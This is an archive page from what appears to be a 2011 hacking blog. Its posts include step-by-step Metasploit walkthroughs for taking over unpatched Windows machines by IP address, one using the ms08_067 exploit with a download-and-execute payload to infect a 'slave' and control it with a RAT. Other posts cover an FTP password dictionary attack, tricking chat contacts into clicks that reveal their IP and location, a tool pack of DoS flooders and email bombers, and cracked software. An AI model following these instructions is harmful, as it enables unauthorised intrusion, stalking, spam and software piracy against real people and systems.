Showing posts with label IP Address. Show all posts
Showing posts with label IP Address. Show all posts

Tuesday, May 31, 2011

NETTOOLS - AWESOME PACKAGE OF CRAZY HACKING TOOLS - DOWNLOAD

DOWNLOAD HERE:
http://www.mediafire.com/download.php?unujzogm3jd
http://users.telenet.be/ahmadi/nettools.htm

This program also called Powertools, becouse its a great program with lots of hacks but also other handy tools like: .bat to .exe / Tr4nsl4t3 / password protection / and things like that!
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Friday, May 27, 2011

HOW TO HACK ANY COMPUTER THROUGH METASPLOIT USING HIS IP ADDRESS

Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it's IP. Lets begin...

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database. Download here: 
http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...


[Image: pgadmin.bmp]

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:

[Image: metasploit.bmp]

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

6.)Type db_host to make sure you are connected correctally.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

7.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

8.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

9.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

___________________________________________________________

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

GET SOMEONE'S IP ADDRESS THROUGH AIM/MSN/CHAT & LOCATION TOO

Free location tracking codes will trace location of your chat buddy with the help of  IP lookup.



These Location tracking codes, which you present in chat room
land on page with good pictures. meanwhile, the other chat buddy's IP Address is stored in a database. IP Look Up identify
Country, Near city, Local time, etc...  of the other buddy.
Get Your  chat Tracking codes.
After Sign Up, you get a set of tracking codes,
Using which you can find Location details.. of  your chat friends.

How to Sign Up

The process of sign up involves entering
1. First name2. Last name3. User name4. Pass word
Sign Up takes less than 20 Seconds to complete.
 Log In to your member page, where you find, your own personalized "Location tracking codes" ready to use in any chat rooms.
Member page
 has mainly two pages
1. Several Tracking Codes (page)
2. Track results (page)

How to Find Location of your chat friend

Very first step is Sign Up. and Log in your member area.

Copy any one tracking code
Past 
that code in chat room text box
Ask
 your chat friend  to click and see the picture.
After few seconds click Track Result link and find chat friend's location details.
Sign Up NOW
NOW U GOT THE IP ADRESS IF U WONT FIND ANY MAP OR LOACATION THEN COPY THE IP ADRESS ND GOTO: www.ip-adress.com  
N paste ur ip there n search... u will find location too...

Thursday, May 19, 2011

BANNER GRABBING

Now that the hacker has a full list of services running on the target system, to be able to exploit them, he has to first figure out what software and version the service is. One way the hacker can get this information, is to telnet into service port. In the example below, we will use command prompt on Windows (Start -> Run -> Type “cmd” -> Enter). If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps.

o Click Start then select Control Panel.
o Select Programs and Features.
o Select Turn Windows features on or off.
o Select the Telnet Client option and click OK.
o A box will appear to confirm installation. The telnet command should now be installed

1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let’s say that when the hacker scanned his target, he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command:
telnet www.targetsite.com 21

As you can see above, I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost.

2. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered.

If the above method doesn’t work for you, then simply use Nmap’s full version detection option to get the information.

WHAT IS PORT SCANNING

The point of port scanning a server is to detect its open ports the port’s listening services. Once a hacker knows all the services running on your server, he could search for possible vulnerabilities they may have and exploit them to take control of your website. In the port scanning example we will use the most popular port scanner: Nmap. The Nmap Security Scanner is available for both Mac and Windows users: http://nmap.org/download.html . The example will be shown using the Nmap GUI (Graphical User Interface). Otherwise known as Zenmap.

1. First the hacker would choose a target and place it in the target box. As you can see the “Command:” section gets updated as well. This is what the command would look like if you were running the CLI version.

2. Next the hacker would choose the “Profile:”, or in other words, the scan type. A smart hacker would go with a quick and quiet scan. Full version detection scans are very loud and could raise suspicion on the other end. Stay away from those options because as you will see later on, there are other ways to get that information.

3. A sample scan result may look like the following:

4. As you can see it found a few open ports and listed the services that are run on them. Below I have a list of some of the most popular ports/services on the internet.


20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet 25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
1352 Lotus Notes
1433 Microsoft SQL Server
1521 Oracle SQL
2049 NFS (Network File System)
3306 MYSQL
4000 ICQ
5800 VNC
5900 VNC
8080 HTTP

5. Along with finding out what ports are running, the hacker needs to also find out what operating system the server is running. There are always a lot of operating system vulnerabilities out there to choose from. So by knowing the operating system, the hacker’s chances of taking over the server go up.

As you can see, there is an option on Nmap to detect the operating system, but this scan is very loud and easily detected so it is better to avoid it if possible. A simple way to determine what the server is running is by getting a 404 error page. You can get there by going to a page that doesn’t exist. For example the hacker would put in “www.targetsite.com/asdlfjasl.php” this page will most likely not exist and bring him to the 404 page. On most sites the 404 error page displays the server operating system along with its version. Many sites nowadays don’t display this by putting up custom 404 pages so this may not always work.

6. If you are planning on using the CLI version of Nmap, or want a more in depth look at all the commands take a look at the Nmap manual: http://nmap.org/book/man.html .

7. Now that the hacker has got all the running services and open ports on the targets system, he will now have to find out what versions the server is running. This is where “Banner Grabbing” comes in.

WHAT IS FOOTPRINTING

Footprinting is the act of gathering information about a computer system and the companies it belongs to. Footprinting is the first step hackers take in their hacking process. Footprinting is important because to hack a system the hacker must first know everything there is to know about it. Below I will give you examples of the steps and services a hacker would use to get information from a website.

1. First, a hacker would start gathering information on the targets website. Things a hacker would look for are e-mails and names. This information could come in handy if the hacker was planning to attempt a social engineering attack against the company.

2. Next the hacker would get the IP address of the website. By going tohttp://www.selfseo.com/find_ip_address_of_a_website.php and inserting the web site URL, it will spit out its IP address.
  3. Next the hacker would Ping the server to see if it is up and running. There’s no point in trying to hack an offline server. http://just-ping.com pings a website from 34 different locations in the world. Insert the website name or IP address and hit “Ping”. If all packets went through, then the server is up.

4. Next the hacker would do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the target website. As you can see this gives a HUGE amount of information about the company. You see the company e-mails, address, names, when the domain was created, when the domain expires, the domain name servers, and more!

5. A hacker can also take advantage of search engines to search sites for data. For example, a hacker could search a website through Google by searching “site:www.the-target-site.com” this will display every page that Google has of the website. You could narrow down the number of results by adding a specific word after. For example the hacker could search “site:www.the-target-site.com email”. This search could list several emails that are published on the website. Another search you could do in Google is “inurl:robots.txt this would look for a page called robots.txt. If a site has the file “robots.txt”, it displays all the directories and pages on the website that they wish to keep anonymous from the search engine spiders. Occasionally you might come across some valuable information that was meant to be kept private in this file.
Now that the basics of footprinting have been explained.

INVISIBLE BROWSING - 7.0

Invisible Browsing has a nicely designed user interface that makes it incredibly easy to change your IP address. Unfortunately, doing so slows your browsing speed down to a halt.

Download from here

WHAT ARE DICTIONARY ATTACKS

Before I get into the example, you must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at here.
1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .
2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.

3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.
4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.
5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.
7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at packetstormsecurity Below are examples of what a username and password list might look like.




8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.



9. If you’re lucky, eventually it’ll get the right Username:Password combination. As you can see below, it got the correct combination of username – admin and password – password.


10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.


11. In place of the IP address 127.0.0.1 would be the hackers IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.

WINAUTOPWN - VERSION 2.4 - DOWNLOAD

This is to announce release of winAUTOPWN version 2.4...

winAUTOPWN is an auto (hacking) shell gaining tool. It can also be used to test IDS, IPS and other Monitoring sensors/softwares...

Download from here

HOW TO HACK A COMPUTER USING NMAP & METASPLOIT - INFECTING THROUGH IP ADDRESS

Requirements:

Nmap
Metasploit

First of all you need target ip of your slave.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on slave’s computer.]

Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slave’s computer.

Now it’s time to exploit slave’s machine.

Exploit depends on the OS, Ports, and Services running on slave’s computer.

So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.

No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]

In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]

You can now control you're slave with RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case if you didn’t get this two OS’, immediately after Nmap scan

You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Good Luck!

ANGRY IP SCANNER - DOWNLOAD

A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins.

Download it from here

TOOL TO TRACE ANYONE'S IP ADDRESS - DOWNLOAD

This is tool to Trace the Victim.

Download from here

QUERIES ABOUT SHODAN

It is a search engine for the network part.

It is similar to our Google Dorks page.
http://shodan.surtri.com/?q=cisco-IOS

http://shodan.surtri.com/?q=IIS+4.0

http://shodan.surtri.com/?q=Xerver (REF: http://www.exploit-db.com/exploits/9718)

- November 29th 2009

http://shodan.surtri.com/?q=Fuji+xerox

http://shodan.surtri.com/?q=JetDirect


- November 30th 2009

http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands%22

http://shodan.surtri.com/?q=port%3A80+iisstart.html

- December 1st 2009

http://shodan.surtri.com/?q=Server:%20SQ-WEBCAM

http://shodan.surtri.com/?q=Netgear

http://shodan.surtri.com/?q=%22Anonymous+access+allowed%22

http://shodan.surtri.com/?q=Golden+FTP+Server (REF: http://www.exploit-db.com/exploits/10258)


- December 5th 2009

http://shodan.surtri.com/?q=%22Server%3A+iWeb%22+HTTP (REF: http://packetstormsecurity.org/0912-exploits/iweb-traversal.txt)

- December 8th 2009

http://shodan.surtri.com/?q=Wordpress

http://shodan.surtri.com/?q=Joomla

http://shodan.surtri.com/?q=Drupal
http://shodan.surtri.com/?q=iPhone+Web+Server

http://shodan.surtri.com/?q=FreeBSD

http://shodan.surtri.com/?q=IPCop

- December 23rd 2009

http://shodan.surtri.com/?q=IBM-HTTP-Server

http://shodan.surtri.com/?q=barra_counter_session

http://shodan.surtri.com/?q=BIGipServer

http://shodan.surtri.com/?q=F5-TrafficShield

http://shodan.surtri.com/?q=st8id

http://shodan.surtri.com/?q=profense

http://shodan.surtri.com/?q=X-dotDefender-denied

http://shodan.surtri.com/?q=X-Cnection

http://shodan.surtri.com/?q=nnCoection

http://shodan.surtri.com/?q=Cneonction

- December 24th 2009

http://shodan.surtri.com/?q=PowerDNS (REF: http://www.securityfocus.com/bid/37650)

- January 11th 2009

http://shodan.surtri.com/?q=ADSL+port%3A80

- January 12th 2010

http://shodan.surtri.com/?q=Default+Password

- February 8th 2010

http://www.shodanhq.com/?q=%22X-Powered-By%3A+PHP%22
http://www.shodanhq.com/?q=%22Sagem%22 (REF: http://www.exploit-db.com/exploits/11633)

- March 6th 2010

http://www.shodanhq.com/?q=vFTPd+1.31 (REF: http://www.exploit-db.com/exploits/11293)

- March 21st 2010

http://www.shodanhq.com/?q=KM-MFP-http (Thanks to: http://www.twitter.com/Motoma)
http://www.shodanhq.com/?q=mod_antiloris (This does not work with PyLoris per Motoma.

April 10th 2010

http://www.shodanhq.com/?q=X-Powered-By:W3%20Total%20Cache

- July 12th 2010

http://www.shodanhq.com/?q=port%3A161+simatic

http://www.shodanhq.com/?q=PLC

http://www.shodanhq.com/?q=scada

http://www.shodanhq.com/?q=bacnet

http://www.shodanhq.com/?q=telemetry+gateway

- November 3rd 2010

http://www.shodanhq.com/?q=X-Content-Security-Policy

- March 31st 2011

http://www.shodanhq.com/?q=Jetty%2F3.1.8+%28Windows+2000+5.0+x86%29

Wednesday, May 18, 2011

MALLORY - TRANSPARENT TCP & UDP PROXY TOOL

Mallory is a transparent TCP and UDP proxy.It can be used to get at those hard to intercept network streams,assess those tricky mobile web applications, or maybe just pull a prank on your friend.
Mallory is,what to say it is bit of a pain to install if your trying to run the setup other than ubuntu.

List of Dependency for mallory:
  • sudo apt-get install mercurial
  • sudo apt-get install python-pyasn1
  • sudo apt-get install python-netfilter
  • sudo apt-get install libnetfilter-conntrack-dev
  • sudo apt-get install python2.6-dev
  • sudo apt-get install python-setuptools
  • sudo easy_install pynetfilter_conntrack
  • sudo apt-get install netfilter-extensions-source
  • sudo apt-get install libnetfilter-conntrack3-dbg
  • sudo apt-get install python-paramiko
  • sudo apt-get install python-imaging


The goal is to man in the middle traffic for testing purposes. The ideal setup for Mallory is to have a “LAN” or “Victim” network that Mallory acts as the gateway for. This can be configured within a virtal machine environment using host only network interfaces. The victim virtual machines then configures the Mallory machine as the gateway by manually setting its gateway. The gateway machine will have at least one WAN interface that grants Internet access. The victim network then uses the Mallory gateway to route traffic.
Download Mallory from here: Download

DRIL - A REVERSE DOMAIN IP LOOKUP TOOL

DRIL (Domain Reverse IP Lookup) tool is a Reverse Domain Tool that will really useful for Penetration testers to find out the domain names which are listed in the target host.DRIL is a GUO,JAVA based appliction which uses the Bing API key. DRIL has a simple user friendly which will be helpfull for penetration tester to do there work fast without a mess. This has been only tested on Linux, yet,with some source changes, it should work on Windows too!

There are online tools available, but many a times due to slow internet connectivity and other issues,we intend to get frustrated while audits. This tool is small and handy will not consume hard-disk space. So,its simply an good and fast alternative.


Download DRIL from here: Download

SENDING ANONYMOUS EMAILS FROM ANY EMAIL ID WHILE AVOIDING SPAM FILTERS

As IT managed services are now focuing on clouds, So is the information security, mails are the biggest threat to every individual and it is not going to end any sooner.
But now a days spam filter do their job quit efficiently making spammers life a bit worried. So here is a online we mean a "cloud service" which can test both spammers and spam filters skills.

Features:
  1. Email Doesn;t go in spam folder
  2. Instant delivery of emails
  3. With attachment Support
  4. With HTML editor
  5. And Many Other Features
Click here to send Mails

Saturday, May 14, 2011

HOW TO FIND THE REAL IP ADDRESS OF A WEBSITE

You can use the PING utility included with Windows to determine the “real” IP address of a web site. Before using this utility, make sure you are not mapping a host name to some IP address with HostName Commander, because if you do, the PING utility will show the address you’ve set up with HostName Commander, instead of the “real” IP address.
To run the PING utility, click on the Windows Start button, and choose Run from the Start Menu. If you use Windows 95,98, or Me, enter “command” (without the quotes) as the command line to run. If you use Windows XP,2000, or NT, enter “cmd” (again, without the quotes). Click OK and the command prompt window should appear on the screen.

Now enter the word “ping” (without the quotes) followed by a space, followed by the host name you want to determine the IP address of, and press Enter:
 
ping.jpg

In this example, the IP address of the host name www.rkgit.edu.in is 74.52.201.2 & IP Address of the host name www.kiet.edu is 220.225.19.55 . (Keep in mind that the IP address may change in the future!). If the PING utility reports an error, make sure your computer is connected to the Internet when you are running it.

HIDE MY IP 2009 - FULLY CRACKED

Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Hide My IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button.

Main Features

Easily Conceal Your IP Address - Just click “Hide IP� and your IP is instantly hidden! Other people see a fake IP, which is not associated with your real IP. Click here to read how it works.

Anonymous Web Surfing - Protect your privacy and cover your tracks! Select from one of our many fake proxy IP addresses for totally anonymous browsing.

Advanced Application Support - Hide My IP 2009 works with all major browsers and dozens of instant messengers, E-mail clients, games, and more!

Protect Your Identity and Stop Hackers - Identity thieves can use your IP addresses to compromise your computer. Installing keyloggers, Trojans, and other tools to aid their crime. Stop them at the source by hiding your IP!

Send Anonymous Emails - Hide your IP in E-mail headers. Supports Webmail services like Yahoo, Hotmail, and GMail. Mail clients supported with a Premium account include Outlook, Outlook Express, Eudora, and more!

Un-ban Your IP From Forums, Blogs, and other Websites - By faking your IP you can often access many sites you were banned from.

DOWNLOAD: http://www.megaupload.com/?d=YN47SG0K

CODE:  http://rapidshare.com/files/273628504/Hide_My_Ip_2009_Finally_Cracked_By_Norman_100__Works.rar

Patch: http://www.megaupload.com/?d=0E848B3J
http://rapidshare.com/files/273629037/AnyVidSerial.exe

PORTABLE HIDE IP PROFESSIONAL 3.50

Hide IP is the software you are looking for! Keeping your privacy is simple and easy: the
only thing you need to do is open Hide IP. Hide IP will find the proxy server available to
you and set it as your proxy server automatically. There is nothing need you to concern.
Hide IP have done everything for you.

DOWNLOAD LINK:
http://www.easy-share.com/1903557293/porthipla3.5.viper.rar
OR
http://rapidshare.com/files/195208011/porthipla3.5.viper.rar

EASY HIDE MY IP WITH SERIAL & CRACK

You can hide your IP Easily with Hide my IP software... Included Crack and serial in this software...

Download Now
or
http://www.megaupload.com/?d=PW7T7FQ4